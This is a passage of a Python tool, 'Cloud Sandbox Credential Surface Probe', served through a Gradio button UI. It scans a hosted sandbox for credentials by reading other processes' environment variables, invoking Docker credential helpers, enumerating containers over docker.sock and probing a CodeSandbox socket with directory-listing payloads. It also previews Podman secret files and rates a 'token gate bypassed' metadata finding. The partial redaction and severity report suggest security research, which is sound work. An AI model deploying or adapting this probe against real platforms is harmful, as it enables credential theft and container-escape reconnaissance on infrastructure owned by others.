        try:
            with open(os.path.join(proc_root, pid, "environ"), "rb") as handle:
                blob = handle.read(16384)
        except Exception:
            continue
        readable += 1
        # Entries are NUL-separated "KEY=value" byte strings.
        for chunk in blob.split(b'\x00'):
            text = chunk.decode("utf-8", errors="replace")
            if '=' not in text:
                continue
            key, _, value = text.partition('=')
            if key in reported_keys:
                continue
            if not (SENSITIVE_ENVIRON_RE.search(key)
                    or SENSITIVE_ENVIRON_RE.search(value)):
                continue
            reported_keys.add(key)
            findings.append({
                "pid": pid, "key": key,
                "value_preview": redact_value(value, 12),
                "value_length": len(value),
            })
    return {
        "supported": True,
        "pids_sampled": sampled,
        "pids_readable": readable,
        "finding_count": len(findings),
        "findings": findings,
    }
| # --------------------------------------------------------------------------- | |
| # Channel 7 – Docker Credential Helper | |
| # --------------------------------------------------------------------------- | |
def collect_channel_7():
    """Channel 7: find Docker credential helpers named in a Docker config.

    The first existing config file among the candidate locations is parsed.
    Helpers named by ``credsStore`` and ``credHelpers`` are looked up on PATH
    and, when present, invoked via _try_helper_list. A fixed list of helper
    binaries is then checked on PATH as well. That second check is reached
    only after a config file has been found and parsed, because the function
    returns early otherwise.
    """
    import glob

    # Search multiple possible config locations
    candidates = [
        os.path.expanduser("~/.docker/config.json"),
        "/root/.docker/config.json",
        "/home/*/.docker/config.json",
    ]
    config_found = None
    for candidate in candidates:
        if "*" in candidate:
            first_file = next(
                (m for m in glob.glob(candidate) if os.path.isfile(m)), None)
            if first_file is not None:
                config_found = first_file
        elif os.path.isfile(candidate):
            config_found = candidate
            break

    result = {"status": "not_found", "config_path": config_found, "helpers": []}
    if not config_found:
        return result
    try:
        with open(config_found, "r", encoding="utf-8") as fh:
            data = json.load(fh)
    except Exception as exc:
        result["error"] = f"{type(exc).__name__}: {exc}"
        return result

    helper_names = []
    creds_store = data.get("credsStore")
    if isinstance(creds_store, str):
        helper_names.append(creds_store)
    cred_helpers = data.get("credHelpers", {})
    if isinstance(cred_helpers, dict):
        helper_names += [v for v in cred_helpers.values() if isinstance(v, str)]

    for name in sorted(set(helper_names)):
        bin_name = f"docker-credential-{name}"
        present = bool(shutil.which(bin_name))
        entry = {"name": name, "binary": bin_name, "binary_found": present}
        if present:
            entry["list_result"] = _try_helper_list(bin_name)
        result["helpers"].append(entry)

    # Also check for the binary even without config
    well_known = ("docker-credential-secret", "docker-credential-ecr-login",
                  "docker-credential-gcloud", "docker-credential-helper")
    for bin_name in well_known:
        if not shutil.which(bin_name):
            continue
        if any(h["binary"] == bin_name for h in result["helpers"]):
            continue
        entry = {"name": bin_name.replace("docker-credential-", ""),
                 "binary": bin_name, "binary_found": True,
                 "note": "found_in_PATH_without_config"}
        entry["list_result"] = _try_helper_list(bin_name)
        result["helpers"].append(entry)

    result["status"] = "detected" if result["helpers"] else "not_found"
    return result
| def _try_helper_list(bin_name): | |
| """Try echo '' | docker-credential-xxx list""" | |
| import subprocess | |
| try: | |
| proc = subprocess.run( | |
| [bin_name, "list"], | |
| input=b"", capture_output=True, timeout=5, | |
| ) | |
| out = proc.stdout.decode("utf-8", errors="replace")[:512] | |
| err = proc.stderr.decode("utf-8", errors="replace")[:256] | |
| return { | |
| "returncode": proc.returncode, | |
| "stdout_preview": redact_value(out, 80), | |
| "stderr_preview": redact_value(err, 80) if err else None, | |
| } | |
| except FileNotFoundError: | |
| return {"error": "binary_not_found"} | |
| except Exception as exc: | |
| return {"error": f"{type(exc).__name__}: {exc}"} | |
| # --------------------------------------------------------------------------- | |
| # Channel 8 – Sidecar / Reverse Proxy (detection by absence) | |
| # --------------------------------------------------------------------------- | |
def collect_channel_8():
    """Channel 8: look for hints of a sidecar or reverse proxy.

    Indicators are proxy-related environment variables that are set, plus an
    ``iptables -t nat -L -n`` listing that mentions REDIRECT or DNAT. Any
    failure to run iptables is ignored. Status is ``possible`` when at least
    one indicator was found, else ``not_observed``.
    """
    import subprocess

    proxy_keys = ("HTTP_PROXY", "HTTPS_PROXY", "http_proxy", "https_proxy",
                  "NO_PROXY", "no_proxy")
    indicators = [
        {"type": "proxy_env", "key": key,
         "value_preview": redact_value(os.environ[key], 30)}
        for key in proxy_keys
        if os.environ.get(key)
    ]

    # Check if iptables has NAT rules redirecting outbound traffic
    try:
        completed = subprocess.run(["iptables", "-t", "nat", "-L", "-n"],
                                   capture_output=True, timeout=5)
        listing = completed.stdout.decode("utf-8", errors="replace")
        if any(marker in listing for marker in ("REDIRECT", "DNAT")):
            indicators.append({"type": "iptables_redirect",
                               "preview": redact_value(listing, 120)})
    except Exception:
        pass

    status = "possible" if indicators else "not_observed"
    return {"status": status, "indicators": indicators}
| # --------------------------------------------------------------------------- | |
| # Channel 9 – UDS Proxy | |
| # --------------------------------------------------------------------------- | |
def collect_channel_9(timeout):
    """Channel 9: enumerate Unix domain sockets and probe selected ones.

    Socket paths are grouped by substring: ``docker.sock``, ``pitcher``,
    ``git`` combined with a ``.sock`` suffix, and ``vscode``. A path may land
    in more than one group, and everything else is ``other``. The first
    docker and pitcher sockets, when present, are probed. *timeout* is
    accepted but not used by this function.
    """
    socket_files = find_socket_files()

    def containing(fragment):
        return [path for path in socket_files if fragment in path]

    docker_socks = containing("docker.sock")
    pitcher_socks = containing("pitcher")
    git_socks = [path for path in containing("git") if path.endswith(".sock")]
    vscode_socks = containing("vscode")
    classified = set(docker_socks) | set(pitcher_socks) | set(git_socks) | set(vscode_socks)
    other_socks = [path for path in socket_files if path not in classified]

    docker_probe = _probe_docker_socket(docker_socks[0]) if docker_socks else None
    pitcher_probe = _probe_pitcher_socket(pitcher_socks[0]) if pitcher_socks else None

    return {
        "status": "detected" if socket_files else "not_found",
        "total_count": len(socket_files),
        "docker_sockets": docker_socks,
        "pitcher_sockets": pitcher_socks,
        "git_sockets": git_socks,
        "vscode_sockets": vscode_socks,
        "other_sockets": other_socks,
        "docker_probe": docker_probe,
        "pitcher_probe": pitcher_probe,
    }
def _probe_docker_socket(sock_path):
    """Query a Docker daemon over a Unix socket and summarise what it returns.

    Lists containers (``/containers/json?all=true``), inspects at most the
    first 10 of them, then lists images (``/images/json``, at most 15 kept).
    Environment values are passed through ``redact_value`` before being
    stored.

    Args:
        sock_path: Filesystem path of the Docker socket.

    Returns:
        dict that always has ``socket_path`` and ``accessible``. On success it
        also has ``container_count``, ``containers``, ``image_count`` and
        ``images``. ``error`` is set when the path does not exist
        ("not_found") or when any request/parsing step fails; data gathered
        before the failure is kept.
    """
    result = {"socket_path": sock_path, "accessible": False}
    if not os.path.exists(sock_path):
        result["error"] = "not_found"
        return result

    try:
        containers = json.loads(uds_http_get(sock_path, "/containers/json?all=true"))
        # Only a JSON array counts as a container listing. Any other payload
        # (for example an error object) must not flag the socket as accessible,
        # because the assessment rates an accessible docker.sock as "high".
        if not isinstance(containers, list):
            raise ValueError(
                f"unexpected /containers/json payload: {type(containers).__name__}")
        result["accessible"] = True
        result["container_count"] = len(containers)
        result["containers"] = []
        for container in containers[:10]:
            result["containers"].append(
                _inspect_docker_container(sock_path, container))

        images = json.loads(uds_http_get(sock_path, "/images/json"))
        if not isinstance(images, list):
            raise ValueError(
                f"unexpected /images/json payload: {type(images).__name__}")
        result["image_count"] = len(images)
        result["images"] = [{
            "id_short": (img.get("Id") or "")[:20],
            # ``or`` also covers an explicit JSON null, not just a missing key.
            "tags": img.get("RepoTags") or [],
            "size_mb": round((img.get("Size") or 0) / 1048576, 1),
        } for img in images[:15]]
    except Exception as exc:
        # Best-effort probe: record the failure instead of propagating it.
        result["error"] = f"{type(exc).__name__}: {exc}"
    return result


def _inspect_docker_container(sock_path, container):
    """Build the summary entry for one container from the list + inspect calls.

    Inspect failures are recorded under ``inspect_error`` and leave the
    list-level fields (id, image, state, names) intact.
    """
    cid = (container.get("Id") or "")[:12]
    entry = {
        "id_short": cid,
        "image": container.get("Image", ""),
        "state": container.get("State", ""),
        "names": container.get("Names", []),
    }
    try:
        inspect = json.loads(uds_http_get(sock_path, f"/containers/{cid}/json"))
        # Fields may be present but null; ``or`` keeps one null field from
        # aborting the rest of the summary.
        config = inspect.get("Config") or {}
        entry["env"] = []
        for item in config.get("Env") or []:
            if "=" in item:
                key, _, value = item.partition("=")
                entry["env"].append(f"{key}={redact_value(value, 16)}")
            else:
                entry["env"].append(item)
        entry["mounts"] = [{
            "type": m.get("Type"), "src": m.get("Source"),
            "dst": m.get("Destination"), "rw": m.get("RW"),
        } for m in inspect.get("Mounts") or []]
        host_config = inspect.get("HostConfig") or {}
        entry["privileged"] = host_config.get("Privileged")
        entry["pid_mode"] = host_config.get("PidMode")
        entry["network_mode"] = host_config.get("NetworkMode")
        entry["cap_add"] = host_config.get("CapAdd")
    except Exception as exc:
        entry["inspect_error"] = f"{type(exc).__name__}: {exc}"
    return entry
def _probe_pitcher_socket(sock_path):
    """Probe a CodeSandbox pitcher socket with HTTP and JSON requests.

    Sends three HTTP/1.0 GET requests (``/``, ``/health``, ``/status``) over
    a fresh connection each, then a fixed set of JSON payloads through
    ``uds_send_json``. Every attempt is recorded, whether it succeeded or not.

    Args:
        sock_path: Filesystem path of the socket.

    Returns:
        dict with ``socket_path``, ``exists``, ``accessible`` (True once any
        attempt got a response), ``http_hints`` and ``json_hints``. Each hint
        carries the request and either a ``response_preview`` or an
        ``error`` string. Both hint lists are empty when the path is absent.
    """
    result = {"socket_path": sock_path, "exists": os.path.exists(sock_path),
              "accessible": False, "http_hints": [], "json_hints": []}
    if not result["exists"]:
        return result

    # HTTP attempts
    for method, path in (("GET", "/"), ("GET", "/health"), ("GET", "/status")):
        request_line = f"{method} {path}"
        try:
            # The context manager closes the socket even when connect/send/recv
            # raises, so a failed attempt no longer leaks a file descriptor.
            with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as conn:
                conn.settimeout(2)
                conn.connect(sock_path)
                req = f"{method} {path} HTTP/1.0\r\nHost: localhost\r\n\r\n"
                conn.sendall(req.encode())
                resp = conn.recv(2048).decode("utf-8", errors="replace")
            result["accessible"] = True
            result["http_hints"].append({
                "request": request_line,
                "response_preview": sanitize_preview(resp, 300),
            })
        except Exception as exc:
            # Best-effort: a failed attempt is recorded, never raised.
            result["http_hints"].append({
                "request": request_line,
                "error": f"{type(exc).__name__}: {exc}",
            })

    # JSON-RPC / custom JSON attempts
    json_payloads = [
        {"jsonrpc": "2.0", "method": "list", "id": 1},
        {"jsonrpc": "2.0", "method": "help", "id": 2},
        {"jsonrpc": "2.0", "method": "status", "id": 3},
        {"jsonrpc": "2.0", "method": "ls", "params": {"path": "/"}, "id": 4},
        {"type": "list"},
        {"type": "status"},
        {"type": "readdir", "params": {"path": "/"}},
        {"action": "list_files", "path": "/"},
    ]
    for payload in json_payloads:
        try:
            resp = uds_send_json(sock_path, payload, timeout=2)
            result["accessible"] = True
            result["json_hints"].append({
                "request": payload,
                "response_preview": sanitize_preview(resp, 300),
            })
        except Exception as exc:
            result["json_hints"].append({
                "request": payload,
                "error": f"{type(exc).__name__}: {exc}",
            })
    return result
| # --------------------------------------------------------------------------- | |
| # Container runtime artifacts (Podman/crun/libpod) | |
| # --------------------------------------------------------------------------- | |
def collect_container_runtime_artifacts():
    """Collect directory listings and file previews for container runtimes.

    For every path in ``PODMAN_ARTIFACT_PATHS`` the directory listing is
    recorded when it exists. Each existing directory is then walked and a
    preview (up to 1024 bytes, via ``read_preview``) is taken of every file
    whose name ends in ``.json`` or contains "config" / "secret"
    (case-insensitive).

    Collection stops completely once the result list holds more than
    ``max_results`` entries. The earlier ``break`` left only one loop level,
    so the walk kept going and the list could grow past the intended bound.

    Returns:
        list of listing dicts followed by preview entries, in discovery order.
    """
    max_results = 30
    results = []

    for path in PODMAN_ARTIFACT_PATHS:
        info = list_directory(path, limit=30)
        if info.get("exists"):
            results.append(info)

    # Read JSON configs under libpod / crun
    for base in PODMAN_ARTIFACT_PATHS:
        target = normalize_path(base)
        if not os.path.isdir(target):
            continue
        for root, _dirs, files in os.walk(target):
            for name in files:
                lowered = name.lower()
                wanted = (name.endswith(".json")
                          or "config" in lowered
                          or "secret" in lowered)
                if not wanted:
                    continue
                # Checked before each read so the bound ends the whole
                # traversal, not just the current directory.
                if len(results) > max_results:
                    return results
                results.append(read_preview(os.path.join(root, name), limit=1024))
    return results
| # --------------------------------------------------------------------------- | |
| # DNS resolution | |
| # --------------------------------------------------------------------------- | |
def resolve_hosts():
    """Resolve a fixed set of metadata-service hosts and time each lookup.

    Each host is resolved with ``socket.getaddrinfo`` for port 80 and stream
    sockets. Failures are recorded, not raised.

    Returns:
        list with one dict per host, in the fixed order, each holding
        ``hostname``, ``ok``, ``latency_ms`` (rounded to 2 decimals) and
        either ``addresses`` (sorted, de-duplicated) or ``error``.
    """
    hosts = ("metadata.google.internal", "169.254.169.254", "100.100.100.200")
    results = []
    for host in hosts:
        # perf_counter() is monotonic; time.time() can jump when the wall
        # clock is adjusted, producing negative or inflated latencies.
        started = time.perf_counter()
        entry = {"hostname": host}
        try:
            infos = socket.getaddrinfo(host, 80, type=socket.SOCK_STREAM)
            entry["ok"] = True
            # sockaddr is element 4 of each result; its first item is the address.
            entry["addresses"] = sorted({info[4][0] for info in infos})
        except Exception as exc:
            # Best-effort: an unresolvable host is a result, not a failure.
            entry["ok"] = False
            entry["error"] = f"{type(exc).__name__}: {exc}"
        entry["latency_ms"] = round((time.perf_counter() - started) * 1000, 2)
        results.append(entry)
    return results
| # --------------------------------------------------------------------------- | |
| # Assessment (channel-mapped) | |
| # --------------------------------------------------------------------------- | |
def build_assessment(report):
    """Produce a concise, channel-mapped assessment with severity.

    Reads ``report["channels"]`` and emits one finding per channel whose
    ``status`` signals exposure. A channel that is missing (or ``None``) is
    treated as not checked: it produces no finding and shows up as
    "not_checked" in the summary. Previously the summary tolerated missing
    channels but the findings section raised ``KeyError`` for them.

    Args:
        report: dict whose ``channels`` entry maps channel keys
            (``ch1_imds_mmds`` … ``ch9_uds_proxy``) to collector results.

    Returns:
        dict with ``overall_severity`` ("high", "medium", "low" or "none"),
        ``finding_count``, ``channel_summary`` (``channel_1`` … ``channel_9``
        mapped to each status) and ``findings``. "low" is reported when
        findings exist but none is "high" or "medium".
    """
    channel_keys = (
        "ch1_imds_mmds", "ch2_ecs_endpoint", "ch3_irsa_wi",
        "ch4_k8s_sa_token", "ch5_sdk_config", "ch6_env_injection",
        "ch7_credential_helper", "ch8_sidecar_proxy", "ch9_uds_proxy",
    )
    channels = report.get("channels") or {}

    def channel(key):
        # Missing or null channel -> empty dict, so every lookup below is safe.
        return channels.get(key) or {}

    findings = []

    # CH1
    ch1 = channel("ch1_imds_mmds")
    ch1_status = ch1.get("status")
    if ch1_status == "token_gate_bypassed":
        findings.append({
            "channel": 1, "name": "IMDS/MMDS",
            "severity": "high",
            "title": "MMDS token gate bypassed – full keyspace readable",
            "detail": "IMDSv2 PUT from within sandbox returns a valid session token; "
                      "MMDS data including additional_files is fully accessible.",
            "evidence_keys": ["channels.ch1_imds_mmds.mmds_dump"],
        })
    elif ch1_status == "directly_reachable":
        findings.append({
            "channel": 1, "name": "IMDS/MMDS",
            "severity": "high",
            "title": "Metadata endpoint directly reachable without any gate",
            "detail": f"Reachable probes: {ch1.get('directly_reachable')}",
        })
    elif ch1_status == "token_gated":
        findings.append({
            "channel": 1, "name": "IMDS/MMDS",
            "severity": "medium",
            "title": "MMDS token-gated – token acquisition failed",
            "detail": "Endpoint responds with 401; PUT token attempts did not succeed.",
        })

    # CH2
    if channel("ch2_ecs_endpoint").get("status") == "detected":
        findings.append({
            "channel": 2, "name": "ECS Container Endpoint",
            "severity": "high",
            "title": "ECS credential endpoint reachable",
            "detail": "AWS_CONTAINER_CREDENTIALS env var present and endpoint returned credentials.",
        })

    # CH3
    ch3 = channel("ch3_irsa_wi")
    if ch3.get("status") == "detected":
        pointer_keys = [p.get("env_key") for p in ch3.get("pointers") or []]
        findings.append({
            "channel": 3, "name": "IRSA/WI Projected Volume",
            "severity": "high",
            "title": "Workload identity token file accessible",
            "detail": f"Pointers: {pointer_keys}",
        })

    # CH4
    ch4 = channel("ch4_k8s_sa_token")
    if ch4.get("status") == "detected":
        findings.append({
            "channel": 4, "name": "K8s SA Token",
            "severity": "medium",
            "title": "Kubernetes service account token present",
            "detail": f"JWT-like: {ch4.get('jwt_like')}, "
                      f"namespace: {ch4.get('namespace', 'unknown')}",
        })

    # CH5
    ch5 = channel("ch5_sdk_config")
    if ch5.get("status") == "detected":
        file_paths = [f.get("path") for f in ch5.get("files") or []]
        findings.append({
            "channel": 5, "name": "SDK Config Files",
            "severity": "high",
            "title": "Cloud SDK credential files found on disk",
            "detail": f"Files: {file_paths}",
        })

    # CH6
    ch6 = channel("ch6_env_injection")
    if ch6.get("status") == "detected":
        cross = ch6.get("cross_process") or {}
        current_count = ch6.get("current_process_interesting_count", 0)
        findings.append({
            "channel": 6, "name": "ENV Injection",
            "severity": "medium",
            "title": f"Sensitive env vars detected "
                     f"(current={current_count}, "
                     f"cross-proc={cross.get('finding_count', 0)})",
            "detail": f"Cross-process readable: {cross.get('pids_readable', 0)}"
                      f"/{cross.get('pids_sampled', 0)} pids",
        })

    # CH7
    ch7 = channel("ch7_credential_helper")
    if ch7.get("status") == "detected":
        helper_names = [h.get("name") for h in ch7.get("helpers") or []]
        findings.append({
            "channel": 7, "name": "Credential Helper",
            "severity": "medium",
            "title": f"Docker credential helpers found: {helper_names}",
            "detail": f"Config: {ch7.get('config_path')}",
        })

    # CH8
    ch8 = channel("ch8_sidecar_proxy")
    if ch8.get("status") == "possible":
        findings.append({
            "channel": 8, "name": "Sidecar/Proxy",
            "severity": "info",
            "title": "Proxy or traffic redirect indicators detected",
            "detail": f"Indicators: {len(ch8.get('indicators') or [])}",
        })

    # CH9
    ch9 = channel("ch9_uds_proxy")
    if ch9.get("status") == "detected":
        docker_probe = ch9.get("docker_probe") or {}
        pitcher_probe = ch9.get("pitcher_probe") or {}
        docker_ok = docker_probe.get("accessible", False)
        pitcher_ok = pitcher_probe.get("accessible", False)
        total = ch9.get("total_count", 0)
        parts = []
        if docker_ok:
            n = docker_probe.get("container_count", 0)
            parts.append(f"docker.sock accessible ({n} containers)")
        if pitcher_ok:
            parts.append("pitcher socket accessible")
        findings.append({
            "channel": 9, "name": "UDS Proxy",
            "severity": "high" if docker_ok else "medium",
            "title": "; ".join(parts) if parts else f"{total} sockets found",
            "detail": f"Docker: {docker_ok}, Pitcher: {pitcher_ok}, "
                      f"Total sockets: {total}",
        })

    # Overall severity: the highest level present wins.
    severities = {f["severity"] for f in findings}
    if "high" in severities:
        overall = "high"
    elif "medium" in severities:
        overall = "medium"
    elif findings:
        overall = "low"
    else:
        overall = "none"

    # Channel summary
    channel_summary = {
        f"channel_{index}": channel(key).get("status", "not_checked")
        for index, key in enumerate(channel_keys, start=1)
    }

    return {
        "overall_severity": overall,
        "finding_count": len(findings),
        "channel_summary": channel_summary,
        "findings": findings,
    }
| # --------------------------------------------------------------------------- | |
| # Main | |
| # --------------------------------------------------------------------------- | |
def parse_args():
    """Parse the probe's command-line options from the process arguments.

    Options:
        --timeout   float, defaults to ``DEFAULT_TIMEOUT``.
        --json-out  optional path; help text says the JSON report is written
                    there.

    Returns:
        The ``argparse.Namespace`` with ``timeout`` and ``json_out``.
    """
    cli = argparse.ArgumentParser(
        description="Cloud Sandbox Credential Surface Probe v2",
    )
    cli.add_argument("--timeout", default=DEFAULT_TIMEOUT, type=float)
    cli.add_argument("--json-out", help="Write JSON report to file")
    options = cli.parse_args()
    return options
def main():
    """Run every collector, attach the assessment, and return the report.

    The ``--timeout`` value is handed to channels 1, 2 and 9; the other
    collectors take no arguments. Collectors run in the order they appear in
    the report dict.

    When ``--json-out`` is given the finished report is also written to that
    path as JSON. The option was previously parsed but never used. A failed
    write is reported on stderr and does not discard the report.

    Returns:
        dict with ``version``, ``timestamp``, ``runtime``, ``dns``,
        ``runtime_context``, ``channels``, ``container_runtime_artifacts``
        and ``assessment``.
    """
    args = parse_args()
    t = args.timeout
    report = {
        "version": "2.0",
        "timestamp": int(time.time()),
        "runtime": get_runtime(),
        "dns": resolve_hosts(),
        "runtime_context": collect_runtime_context(),
        "channels": {
            "ch1_imds_mmds": collect_channel_1(t),
            "ch2_ecs_endpoint": collect_channel_2(t),
            "ch3_irsa_wi": collect_channel_3(),
            "ch4_k8s_sa_token": collect_channel_4(),
            "ch5_sdk_config": collect_channel_5(),
            "ch6_env_injection": collect_channel_6(),
            "ch7_credential_helper": collect_channel_7(),
            "ch8_sidecar_proxy": collect_channel_8(),
            "ch9_uds_proxy": collect_channel_9(t),
        },
        "container_runtime_artifacts": collect_container_runtime_artifacts(),
    }
    report["assessment"] = build_assessment(report)

    if args.json_out:
        try:
            with open(args.json_out, "w", encoding="utf-8") as fh:
                # default=str: collector output is not guaranteed to be pure
                # JSON types; stringify stragglers rather than abort.
                json.dump(report, fh, indent=2, ensure_ascii=False, default=str)
        except OSError as exc:
            print(f"could not write {args.json_out}: {exc}", file=sys.stderr)
    return report
def probe_environment():
    """Button callback: run the full probe and return the report from main()."""
    return main()
# Gradio UI wiring, executed at module level: a heading, one output text box,
# and one button whose click runs the probe.
with gr.Blocks() as demo:
    gr.Markdown("## 环境探测器")  # heading text: "Environment Prober"
    out = gr.Textbox(label="探测结果", lines=20)  # label: "Probe result"
    btn = gr.Button("开始探测")  # caption: "Start probing"
    # The click handler takes no inputs; its return value is sent to `out`.
    # NOTE(review): probe_environment() returns main()'s report dict, not a
    # string — confirm how the Textbox renders it.
    btn.click(fn=probe_environment, inputs=[], outputs=out)
# Starts the app as a side effect of executing this module.
# NOTE(review): launch() is assumed to sit outside the `with` block — confirm.
demo.launch()